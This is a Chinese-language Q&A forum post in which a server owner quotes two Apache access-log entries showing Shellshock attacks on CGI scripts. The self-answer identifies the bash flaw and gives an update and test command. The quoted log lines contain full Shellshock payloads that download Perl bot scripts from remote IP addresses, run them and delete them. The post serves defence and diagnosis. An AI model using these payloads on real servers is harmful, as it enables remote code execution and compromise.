使用cgi脚本攻击我的apache

时间:2015-01-22 19:54:45

标签: apache cgi

似乎有人成功破解了我的apache服务器。 我在access.log中注意到以下行:

81.169.174.52 - - [22/Jan/2015:17:24:39 +0200] "GET /cgi-bin/contact.cgi HTTP/1.1" 200 1531 "-" "() { :;};/usr/     bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://202.191.121.230/ou.pl      -O /tmp/b.pl;curl -O /tmp/b.pl http://202.191.121.230/ou.pl;perl /tmp/b.pl;rm -rf /tmp/b.pl*\");'"

还有这一个:

80.92.84.168 - - [22/Jan/2015:18:21:08 +0200] "GET /phppath/cgi_wrapper HTTP/1.0" 200 3360 "-" "() { :;};/usr/bin/perl -e 'print      \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESSX\";system(\"wget http://74.208.166.12/bot.txt -O /tmp/bot.pl;perl /tmp/bot.pl;rm -     rf /tmp/bot.pl\");'"
根据HTTP-200,似乎他们已经成功破解了。 我的问题:

  • 有人知道这个问题吗?
  • 如何配置我的apache2.conf以防止此类黑客入侵?

THX

1 个答案:

答案 0 :(得分:0)

我的问题的答案:

问:有人知道这个问题吗?
答:这是一个Bash Shellshock漏洞。

问:我如何配置我的apache2.conf来防止这种黑客行为?
答:只需更新“bash”命令(apt-get / yum install ...)并执行命令以测试您是否仍然容易受到攻击:env x='() { :;}; echo vulnerable' bash -c 'echo hello'

THX